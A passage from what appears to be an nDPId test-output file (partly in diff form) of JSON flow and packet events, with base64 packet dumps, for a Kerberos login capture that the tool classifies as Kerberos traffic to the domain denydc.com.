0ODX0zskLyx4MuxgfLA+rSgSP6ZUJ055iGahoaVYV9SpPKq+xhCqQFrM7itVACVV7bPJb4QOCt0YwnE0k4YXIyrvjeBwv0TOma+s+Pk26lkmMFohcPPh09S
zjbX0LB\/nJU50kl9cOX2RxsnwUxKT64ptV3lFerWVRZ12Rc3nEkevi1b0jJR2PvD7qdm+9x+y4SEkM\/\/znR8jp89KJJfBF1eWXO0dCwgdxUvGxXup\/11HbQS835yW613qHegtnxeXM32CN7BzUPXgbyMrtsocu7vMq7UlNyQL7E27QrzqcIFv7LOWlgBboWP1YYaRCId3CM+v4T\/pcXJx8p0oBnuk8CcRVdoK0SRZww8Uqrg9ipusyREzOOn5tKh1+iWwmAHsizSVWrxInciFG7a1LG3nuYzOwn32U386KlMqGU6x25EYlN1ggNms4IEAxNRZ9xLubotb9xpgHo0ztJXAiCXUH9SE5l2LEDVRzVVcdQV0MPOIzTH\/FZXOa+1tc\/VB08Euy6Bd9na1dbJC9l+Kd21RirJtQ\/T\/0emeJAuVMlmbNxMRxTOQmtTp\/97VpoIBETCCAQ2gAwIBA6KCAQQEggEA8si\/bBGBs0rUs1jXOMObOPMCGmnmTeYlITZW2Wf7sQuBm2SroBfjBri2Z6F9uf3iTF6vCeonbX\/GTWX1Fvcn4uofVntZgvKbdTYkS2d+XFlnruh6P7jVYUezZEoZ8jiGv\/7mm8cprC3zuOzFEDYf7uc8F2nfwaCV8PaBg9p0Jm9+AIzOC2RF7FIdXj9K7GxajcLfzQoBHPOwHqq+anZFZIIUbyjGHPoi2E08Q2cBRBpSYup4O2rhZWb3KhCBYNUzUXpz7EYdkd6s3PjMi8A838Qz4Z1fa3\/7uf0A9ZBBfu8ebbU0HVSPSZkGJL4JCwophGSoBFsnlIMRG1O0GkJa2A=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716089757,"flow_last_seen":946716089757,"flow_idle_time":200000,"flow_min_l4_payload_len":1219,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":1219,"flow_avg_l4_payload_len":1219,"midstream":0,"thread_ts_msec":946716089757,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1076,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":946716089757,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1261,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1261,"pkt_l4_len":1227,"thread_ts_msec":946716089757,"pkt":"AAP\/pqsMAAP\/p6sMCABFAATfAUsAAIAREbsKAQwCCgUDAQQ0AFgEyxJubIIEvzCCBLuhAwIBBaIDAgEMo4IEMTCCBC0wggQpoQMCAQGiggQgBIIEHG6CBBgwggQUoAMCAQWhAwIBDqIHAwUAAAAAAKOCA2xhggNoMIIDZKADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMsMIIDKKADAgEXoQMCAQKiggMaBIIDFnaHOkbe3Ft95M1wKu8wrnnL2KoXK50Wfms4lwl+7nIzTWt\/TBTBxetLCu0b6OiVj3UpYznp3lazrMq98Qwi3aS0sEdZBoJs+Etqw0r7qbOiqGfIzfY5WW7lW95ehl68DOwN7G\/ctJKk8AVM30BgdXD8tz49IVb5LvH8kWVdyLTL7dDroB1zpLEnsskNCGiPKC2kvI4rVQFX\/skMLVm0vrv\/AnhykPJFywmuBCVaX4ilWguDR\/hhedFfzOYZ0xf7kVQmFePGaBfPtyf2tWMm316XiQ6a0ddMjedbQTEPUEaIPhU11lAXVTRXuGNNrbinzU88d0vpPunmiXEQ46Zb2aBwhA2PddlJfkphuRTiKTMYIcDx\/1mQSbo6IMs5BzF09EwRlqL20WWEy+tJbg8F96jQFX9ZfusZkqo2\/Ymtt2KIXO2vcTHWCJfKNWi2oHePkmjQVNqV44BDHKJhg2yYGzOpsCLcIH9xI3jIsbhcV3lnOJelJiIh\/BOztlBncxQJDGM8Ss5lpzuieNTaBQOQBzYsANr2gDw7i5E2tKUZxxU28uYbVQUK6KZjtJp0woRjxeXkug7EiwanRJ+ruwFN4641BrWk2WV7znZLMnOxd9Ixgq276dbW3uk8XghmBk5iO9uBY9B6bl2XBCrn0zJxWO550J7YNhBLCWnZolKhh691S4S\/sMyb9cBhQt9YOq11SPy9kRuQfEqcmeMSn67AgOzJ8mzxQ8a3rs4hfqkn1jH+UhGi1xla+MUNFmVkVcF\/s3a9sERXKT\/GEeYJDkvNw+esHfCK4jalR0pA558BA3fanPrnNu74qdrmsUgOhPibVBiVBOhTvitLl0hsJU5z6U77MFSX4UMd9nw2kPOVPhabSvF2baihVP5t9x+qShNJPWM56UisG6Ab7JzsId2uQf1lTt49iVnnhmjdWddhTtm47iqqL0nJrz7QZtWxYyMQTTtuJpTJCO76PmTywwSdY3tKlhuq3MxMZlzDeglX6VXTiBXGqdqJOfHm8VsI+LTATS2a9Dxo3ZxAgK9aL5NMKTnSmEBKpJmkgY4wgYugAwIBA6KBgwSBgIndYoByC0Q1XL0UkOvReJuk4xMaMJZ+vSX6nvaGHvlQj3sSa06PNSHAnkgj2fx7dbMK5tj+L9hKHDtvRMSujXv2qbqzBpKBYUbifiIw78VvOSWvJj++dB3YwIymbxfa9M6swpxkLP2l4B8pAcaGNYjj1\/qFZcDwa0BSttxF6Oj4pHoweKAHAwUAQIAAAKIMGwpERU5ZREMuQ09NoykwJ6ADAgECoSAwHhsEY2lmcxsWdnBjLXcyazNlbnQuZ
GVueWRjLmNvbaURGA8yMDM3MDkxMzAyNDgwNVqnBgIEFxtNVagZMBcCARcCAv97AgGAAgEDAgEBAgEYAgL\/eQ=="} -00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716089757,"flow_last_seen":946716089757,"flow_idle_time":200000,"flow_min_l4_payload_len":1219,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":1219,"flow_avg_l4_payload_len":1219,"midstream":0,"thread_ts_msec":946716089757,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1076,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} +00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716089757,"flow_last_seen":946716089757,"flow_idle_time":200000,"flow_min_l4_payload_len":1219,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":1219,"flow_avg_l4_payload_len":1219,"midstream":0,"thread_ts_msec":946716089757,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1076,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 
02078{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":946716089757,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1247,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1247,"pkt_l4_len":1213,"thread_ts_msec":946716089757,"pkt":"AAP\/p6sMAAP\/pqsMCABFAATRShcAAIARyPwKBQMBCgEMAgBYBDQEvQ3obYIEsTCCBK2gAwIBBaEDAgENowwbCkRFTllEQy5DT02kEDAOoAMCAQGhBzAFGwNkZXOlggN+YYIDejCCA3agAwIBBaEMGwpERU5ZREMuQ09NoikwJ6ADAgECoSAwHhsEY2lmcxsWdnBjLXcyazNlbnQuZGVueWRjLmNvbaOCAzQwggMwoAMCARehAwIBCaKCAyIEggMe5TejCbdku0sWZODEt+E6OUUMN8VOBkx3zELMQY51bnq2VGhql9SORJyvnK1dFg3jJFS5YPbufxVK9xIZbgEt\/yDkgZFT5ywKZAKUVb5fAeaPY75m6bqAKC9WYz\/BMnDZkwMeSJNr0+Trx8kOf+lNHo7QaR\/P\/+Yk79pv+bK8dl3BmX179458+zSycepAJTN06KRQPVfIea\/xqQ51qJ4YEz\/4CLsKDYszv2gdnSQ1ToQrDMA1DRr9Sk05eeaPB\/+aVDNjsnrJprgd8Dr\/+WyaOqFvJG6A1NE+Lzgqy0b9oQ83dkq4UUtvg30Ai6XfnzIIX\/OdPmFFp0EzafxnejewUcIxBl3+G9Z0R7yzkwR2HRxTry2FP72dUBIAiRF5tU4KZElhfHzVmsIPi0NhGo8Nr8\/PgyGR43Tkbp4I2D8AmBmCa9wr68BV2fUhNcy7XG4\/nFiInqV8vHnjBSRfrJApZh0\/Mg5s8iTQG53JY\/ENQb\/msmGZtHPqNhhbsdDqH+lmOfUO\/rsFoM+A+A7NKV0HxaXem2+2KDVs6XRB397jCpiwvU21eoJh5MbRZu9lHQPac4fqdiG1NV2bvCajFJpm9\/SiaQ4dO3R6QbX1nOAWcnk43IZF9ySTYBCQwP9oubsRlR8h4+wO4jpZte1r9tWFgXmx0aDkW0KbeaSaYNIE9LNzuOCMDEzbj8aoezV2HzBzRhJ2LasRJ8s5NKC3JTvxuJxOJ3bOEGIBjZD9UXeIpuPtxm+T49xwjEqnejhpn83X7S8bJmoZ1ZQ5mNmBkraSR\/DYBjqqfwYS1GirOyuq6eCpwkeO7L\/3OX7yuoFcQ7F\/mivV4JhL3XkovoYZzrHpYA1kmN6qkQyfvpGGqBeLyNnaEcvYDeARqDcsUyGZ+xvgvFZsq25OIETcjG3sIyB0nzy7ba1mYw0RZ9XvZzmJVujSVewjOmE9K29PdUE\/+orVxXua3kiLosyiXhsQ\/snLAaFP8Q95xi6J2njna\/iquiduA7PW6evhPTixCxSIf8ivXgJg03ljz3j1lKVgTQVXWBG49S7+s3oNhaKA6zBgpoH+MIH7oAMCAQOigfMEgfCfbnuNzqoB0hpVugXPSl61u\/o0AiFH0HluNEtCO\/zCcExA35l04OGC1gH6aG3sbOAtVL0zjnnSshrcN39wa67DJ+FHbuSdE3kCJEF+cg6URhPmpUj2257XKU3gjVRTNW9gbSPgJKKlhaknblR0mV7SuU6d7Lg\/Wj1+zz2sH13Rh6dbGo4FT+T9HaP2ndnqiHLxbH7MQv4hm303HhUQGMfdS5gKXMGoezzcUNcL7Q0QhxZef8Fj
m6Apvz8AQrgOKbr0UGXxnHWlWaZvsYpBtFO8piUPee5nAjyNucMhYsRC6Jv2Wkno+aTJzG82WW0TaKg="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716138858,"flow_last_seen":946716138858,"flow_idle_time":200000,"flow_min_l4_payload_len":1213,"flow_max_l4_payload_len":1213,"flow_tot_l4_payload_len":1213,"flow_avg_l4_payload_len":1213,"midstream":0,"thread_ts_msec":946716138858,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1084,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":946716138858,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1255,"pkt_l4_len":1221,"thread_ts_msec":946716138858,"pkt":"AAP\/pqsMAAP\/p6sMCABFAATZAbwAAIAREVAKAQwCCgUDAQQ8AFgExfGLbIIEuTCCBLWhAwIBBaIDAgEMo4IEMzCCBC8wggQroQMCAQGiggQiBIIEHm6CBBowggQWoAMCAQWhAwIBDqIHAwUAAAAAAKOCA3NhggNvMIIDa6ADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMzMIIDL6ADAgEXoQMCAQKiggMhBIIDHQjKO\/OerPJHUVXfuxVJdD6vQ\/NGnGmBmwOn3bLBqbqsG+g9Nnh6yrjY9d5E8AiotGFppGx9xNmwBuNImiFxfNmEg3uH\/dVWHWd9q6uqNxlq4l9BJeInWbk24gfTvjnZPIxaZOXaPKIGWKEoPwfUvG\/abmHOJrJ5dMqDjXn12Gq8qtlDgO9bMEikjGol\/XgOEE3AqGuDQOYN9AD6KcodXf5ljyBptwjxxESj\/S7Kz6h9QlJX\/bPF65u69HCFC8D0O6x6SYPpJQwgF50VHzn1+N9mnFznaYa4AuT0H16bY8ZWk3memHUdpKXbLDzDp6emMp2eXP9emxJFFQUS8M0f5586iB49EBRS2s2EePfPWcS+mN6DYaBg353AwYez1LgB7Puw2NNPPDFlVjYUyyXH0HyxP0DEXpuQEC\/rdkI6wknQh6G9lmGk2V81WgdZlSk+CkiL56oBtMGCilRDVhAoqC0vJ\/kGf6XxSotqKkgy7VrgIiRT5V9xjt1UD8Owk9PKQI1siEvlyDkxYrEr6vzyGdjEEdn1J2\/RqVT6BVnLZeIc6uZNYodQZDbClePn\/tiBzWIRfAABFzPaDqIFcuWvlbnXtgo9ok+GZagM6tVQSYA2oI8Ouq3NIlhKPE5+ABgG8QDVDW9xKR6jazl4jwze2
syl\/MUew4xW0tECxLEoLa9NakqgdATDmNUFpJN28enDUQmyRHxLZXoA9\/ospwta8qlV2PwCoVT6RgWgTuQJ3MiC3t0xe4KttF6BQzzO2NIQtnis5g6Y+NA+4n3\/6C06Co88hSP1GAjHrL7luPNd8ekpQbd4VN\/4aBwpNyND5UJJp3UfoikXYoZjPstHkPGruoqJbMAzvEbw0YHk5OawAbEBovxdDTmt0hq2gTWpPyhWURYpkQK96gfjWNYYjdu\/yqBGeN79ct+2MSNrWdYxc8k97LFdE8M8strlBYslyNaAo10tUaZHxe2S1NU0Pje8WixjspIMBprxsDdc+QA2jV2yFgxGRAAixpl7jXmQTHC8SJM8dp5tGAPdd3ds1tc0+eh0QnULGo4wNzIvVyRepIGJMIGGoAMCAReifwR9lMd45uQbgXPTUIapDv8npUAWyRXZFOREDSDyTMId\/udk9oDJ6G\/euSGZP5KVe\/VjIHeDWzWbDfubRUpsXZHld7TQjYmW4Rs1jBphjET6HxcWhRDNxUzPznoCq1aAneOtGkpAE1SAVv5nmbRuATtalQZ+bAF+mz2FCK\/FEcOkcjBwoAcDBQBAgAAAogwbCkRFTllEQy5DT02jITAfoAMCAQOhGDAWGwRob3N0Gw54cDEuZGVueWRjLmNvbaURGA8yMDM3MDkxMzAyNDgwNVqnBgIEMvbUaKgZMBcCARcCAv97AgGAAgEDAgEBAgEYAgL\/eQ=="} -00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716138858,"flow_last_seen":946716138858,"flow_idle_time":200000,"flow_min_l4_payload_len":1213,"flow_max_l4_payload_len":1213,"flow_tot_l4_payload_len":1213,"flow_avg_l4_payload_len":1213,"midstream":0,"thread_ts_msec":946716138858,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1084,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 
+00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716138858,"flow_last_seen":946716138858,"flow_idle_time":200000,"flow_min_l4_payload_len":1213,"flow_max_l4_payload_len":1213,"flow_tot_l4_payload_len":1213,"flow_avg_l4_payload_len":1213,"midstream":0,"thread_ts_msec":946716138858,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1084,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 02056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":946716138858,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1228,"pkt_l4_len":1194,"thread_ts_msec":946716138858,"pkt":"AAP\/p6sMAAP\/pqsMCABFAAS+SnoAAIARyKwKBQMBCgEMAgBYBDwEqiHZbYIEnjCCBJqgAwIBBaEDAgENowwbCkRFTllEQy5DT02kDzANoAMCAQGhBjAEGwJ1NaWCA3VhggNxMIIDbaADAgEFoQwbCkRFTllEQy5DT02iITAfoAMCAQOhGDAWGwRob3N0Gw54cDEuZGVueWRjLmNvbaOCAzMwggMvoAMCARehAwIBAqKCAyEEggMdqLwk5xMrYJDEwUM\/QQ3VuJIMmn2OQy\/0I5DhAfTNQGcPQSHS5CEPtM6jxjRZTCw0Ai2nHWAOEUdEUEOTCsPK9M6imAlLkM1n1k\/UGy5\/efNw9H0itaqJvDeRfga5lhYWuYKRnVa5Zb2LcF\/jioC043WMRCe+qPxfvoD6RNCKqILp+4B1YsvS2vzC5bMQYCNY08f7Now1c0NTrALudLRPAfPB5qHuxo+5N+QIUogMdV9qnsCd2ZbjBZvLV15UkZvO83kVHjMrBpQvSRkHNM6\/zRHc+YfyXwWcNuMbRJAN7+Y7NptXQN4NQ\/OQONLYDFSpYczYU68F3URsxvORHrchVGGmn8MKbv0DeaLF9\/+1M5uAKlz+88rw9y7LuckjG8DbH5sf7ISfJhh4NpBawzg6k\/JL9yv4tOp\/xZjhDbxy16xt6dThtbRjxdaqF3Oo1fkTqbsbZQ04EfvrQiAKfP8sBfX1niEY31SqDPpx\/8v9Bl4EFm1Lvzn9HEAXkXg08aOVFGh3BlduaucK6Rpky2Svc9ertDKj6f8Jzh5m+eNWEcDW2815fGqRdvI+\/+qRl9E7qnl5GXq1cujOic+M8vy97CJqAPJsJL0kZb9kLdJ7nNjJvKCqlaAeqALPy9KgKZe
JI9XzJ\/bmARdSFV3xJS\/loG2otpDyX\/2ZWUUEEYQBfy25AEWmnMEq46q5p8W8sP+x3s3phxQUDhHnECEca5WsO9VlgPBPiXMJUJKXhmrS5SLOi09mh8G5CLVTQ3NPdA3bU+xaruZhwYPHofzIXF6vn7K2SBJl+eOlpH6yNl8HiCimirDhutKQGTz2awDOPcFgFI\/juzSQ1pPwto3mGkmlSzi4GVpCSApYIFoHmyNDW\/TOL6f5HCyq\/trjdKC\/ZHWToa8s93rTdvZG9ggmKkqaDFEkrhUgUNoZm6q0C7CRK\/gWjnTrIuqp6g9Zs5Y3Zi\/GUU52nMhFDbGMTP1y+eYCYah8859k4tGGHP99nZQMMZRm+bwLZF2aQRlHGRkaYdOhdalKGqqR9iVOZE9suIckWSsyYB\/vnKNqXG4WexSmgfUwgfKgAwIBF6KB6gSB54cXkLwMBkHM9GQeHGY5ZtSK62KJIQoTlEQU2I54gWvNeM\/zJ6ckBQIXZfilBpfek4Y7orr+xZTCdwvT6Gkzc8BtAu8Yz26KAHBerh9WWO9UuMFgGKt+q7TjON\/oL8kBFbmuPaEyYkDCskT3ez9VuxsuD8VXmUohQzQmxOOLQNtyXpvmRcjw0Q6TiGceTbHWYeAmvwx+IeCs\/clsg\/iyBjPLq2v90n4ztoRrTjk81TustGQcsaOf4B7RqzGEcyvKXNeQEVbZT3jI5BaO4+aYcmeXzBkymlSvszStGb\/MiP1mGnDZCtbFTw=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716139910,"flow_last_seen":946716139910,"flow_idle_time":200000,"flow_min_l4_payload_len":1221,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":1221,"flow_avg_l4_payload_len":1221,"midstream":0,"thread_ts_msec":946716139910,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1089,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02093{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":946716139910,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1263,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1263,"pkt_l4_len":1229,"thread_ts_msec":946716139910,"pkt":"AAP\/pqsMAAP\/p6sMCABFAAThAfwAAIAREQgKAQwCCgUDAQRBAFgEzdG6bIIEwTCCBL2hAwIBBaIDAgEMo4IEMzCCBC8wggQroQMCAQGiggQiBIIEHm6CBBowggQWoAMCAQWhAwIBDqIHAwUAAAAAAKOCA3NhggNvMIIDa6ADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMzMIIDL6ADAgEXoQMCAQKiggMhBIIDHcAYVO+Q2IXUSYyHjuVHfKxUHYGW7TjhCP7ht14YomVNNTmVhUnNVAEemRFIQsjfyH7Id6NfOJsQ1ejL1lbQdxG+gxX6ALA\/MK9eCjPeeH1HN\/61cBhJfEoqY2F\/mKeHRuCggrFXQbZxlsXVGLtZu4PWih8KNf7sWfI01ih\/KOVOFbC+DQgRsewUOZidaGbk8YDAWfLTeW1icWpEgz\/\/XQZftiBtg72zgDTGa\/mE6hUu8t57cVSOGEQlF1ZQKVTTZOn9zHhQisTijr021JJttOf7qpJ5+uomVPYE8lx0pL85ESuIwtqHGJcBMVlPS1H8MreebQzjvMWuoHQUc\/OGtz6S3YhFyDPaOH1iZQXjznPs\/MyXoX\/WPWeAVNxUiY9FXqN8Ysyj493ju1vpN6nhvsrEoaZdGaTppTmaoJXuyc1CSns2LWWlo8V5W5bAI5ei3AXjL1oeF7Et2GbqYgAGntju2FLJBhD\/4R9ROO1oMGYhSCMMKYRZ9+nR1+RMN\/cuq64EBBvfHy6tayyRjsACSMzeD4dT5O1By9VoDbf\/l3TiOVyUpKN6HtnGTLks0PEgzGhBo12SoVAT914LxU8URDkKFF0IvIDKHRP2PfXNHrTqwCKivWiNW4Y4msxofW+KFzIutb67iawdaddMq1dxg27Qc6okQGPjpdNfDl7H1FT8XYGvgXsggcVItUDBSFzgmIrorZjg1UIv0N65LTCbyuSoTSRNZLyNRs5IjZa6b6aNmzfJeURuRlXpFmy55SswzPpOVIbpqN9UjrKoARvOdTXIy7zAlLTf79OOzEiGttGb1lQL8qGp6NvmbBOCY3s1pqh3u0pNR2XX5Z1LkgF8exqSVZL2UsbFy1H87cEdwhSaPgKai6SsQvAamU+n99gLhejxN3\/mg\/VFw+wucn7jxY5D9SmJGaVA97YjoZZdGLogQ15cOtgSBPsYJESl4I46m0Z6YgTQJDNcPvLgJDlNJtTGXZLJ9sOGxpwEknEXtocEjmZZBksfp4wtv7t34FGLYzt1idyslHkz+eOdJAgfnLj7Zmp43EncB0hi68U9pIGJMIGGoAMCAReifwR9ja9JTPG3V\/hvRGIuwwosj7sUS1LIBhu\/Wifub2xWICGiRE3t3KocfEIlQLYWq\/DPZTWwjHn6UXJcc+obF5QFMijJyc7I6Y2c\/iHufGqAYJ55sZ1MlMHaFibC0j1nl7WX824jCbyDB0A7iID0+4KwIDf2mftb7CZ5GwsbZaGkejB4oAcDBQBAgAAAogwbCkRFTllEQy5DT02jKTAnoAMCAQKhIDAeGwRMREFQGxZ2cGMtdz
JrM2VudC5kZW55REMuY29tpREYDzIwMzcwOTEzMDI0ODA1WqcGAgQyDNPhqBkwFwIBFwIC\/3sCAYACAQMCAQECARgCAv95"} -00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716139910,"flow_last_seen":946716139910,"flow_idle_time":200000,"flow_min_l4_payload_len":1221,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":1221,"flow_avg_l4_payload_len":1221,"midstream":0,"thread_ts_msec":946716139910,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1089,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} +00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716139910,"flow_last_seen":946716139910,"flow_idle_time":200000,"flow_min_l4_payload_len":1221,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":1221,"flow_avg_l4_payload_len":1221,"midstream":0,"thread_ts_msec":946716139910,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1089,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 
02065{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":946716139910,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1244,"pkt_l4_len":1210,"thread_ts_msec":946716139910,"pkt":"AAP\/p6sMAAP\/pqsMCABFAATOSrQAAIARyGIKBQMBCgEMAgBYBEEEukqkbYIErjCCBKqgAwIBBaEDAgENowwbCkRFTllEQy5DT02kDzANoAMCAQGhBjAEGwJ1NaWCA31hggN5MIIDdaADAgEFoQwbCkRFTllEQy5DT02iKTAnoAMCAQKhIDAeGwRMREFQGxZ2cGMtdzJrM2VudC5kZW55REMuY29to4IDMzCCAy+gAwIBF6EDAgEJooIDIQSCAx0OqRcPC8vGYJMz45I+hnyANZGJTsVyPTfCUHSBYlVv3VsQhqvRCnWfKr8tTLjMqudYuEJcF+L7XXCnqhYRSBYCFSiBtDPYZ+zwUrPQcBOUWNrwWN58rjlJI4rsfBOkYxKiA091ERchIo4brfg0wihOd1Khcn2hzhSClVIVccTK\/MjYF+xwb7R+X7kwWhBvkFjfCZEYfA39Px1Z6N8hCMZo9D01bu6vlQ1L2sCTq56bCR\/KPgJuesTh2ci1V8F2+s6Tbp2DXg32HvP74XuVtAG\/HdbFy6FP07mReXboks0HCdmNsIlugwTOFBoA0KdeJzt8rCaVLAPeTF6sn3Wub3dm5MAcVfMzvX6SeOcAKsxjskWhTVsE1CxSWYOUSzDEjqTLi5kitJt9vt0EYDo5nzmFWJL+4tqipdqqhpXyxt\/eIG+ZKjZQnz7edpkZJ1AvWiB3rSygvM8tpdnoQN6M6xvZEVYvRrjduR8WdbAhOyBR5bbA0oQdHGNvLYk4F+wtKfihMmzqYshJJAtUQlY76J08RDvvQfbmoCZY5bAXD\/7kVPF4HPV0cv6EoSU4U\/HcDvpW5plwj64n2qkequshx7O\/if1m8JJBPr46eU4WYs5FeaVHYIuCbvCDprb46iNeeud+9E+PFvI9FTKa8wNRbfXDP8Ovfmd2VJ\/o44eQNFUlizwKCMjBE9mhtfH0exvRf9koiWuOtjPAcGYCwU5ZcidWSgY8qntr4v12EkQ31Ru9iaH7Ds2SQSbUoSlP2AJYJ5N7lcaA4QwH8HXGYNXFhMAvIWTT8gO1ogAVjbRSKZnUhxzylt8Cwxmsviyf0ElQbNqauMI1rIs+2E3U6DIzgZvVE6M+D5xiF\/I6rVkyiSJelPA2z3VWNpqE9DgjCm\/tuHHLGElEBVg5sPGqh4fSKejZiyauGHl8kEx7g0JMP\/mPRFISiUdUoBYEq1n0ex96Hd9j8sDPrIE9lLidr+jj0zrPZoOHVLsPzuKkr0gr77hTeUSayXj23NNBAmIy6xS0IlU5qV8+5PPTp+xEoPRGNzbrV627P5IsgKqwjsNVzqaB\/TCB+qADAgEXooHyBIHvNIbb12U6B68TB7gF\/cQpmJg65K85wYZpHYzYAvTf7nc6Nmbb0GdRruPUOQVRPFzlpfFfYYa5FAFk3n4UHYGqXU5X\/AD0rZUkAb\/DMiELvM8Q+804OYWVkjbxajg5SPY1\/VFM0jodkL9eXE7uZVXCVaan0c9VCVcYGBwSjpydUKhBZjYkNquu5nhriSIUJAaerM1J7JSISt1jRUmzAAal6Bli3pWLBS1Bmwu4xio0vlrXiz88OHTHhzcbkw7W8
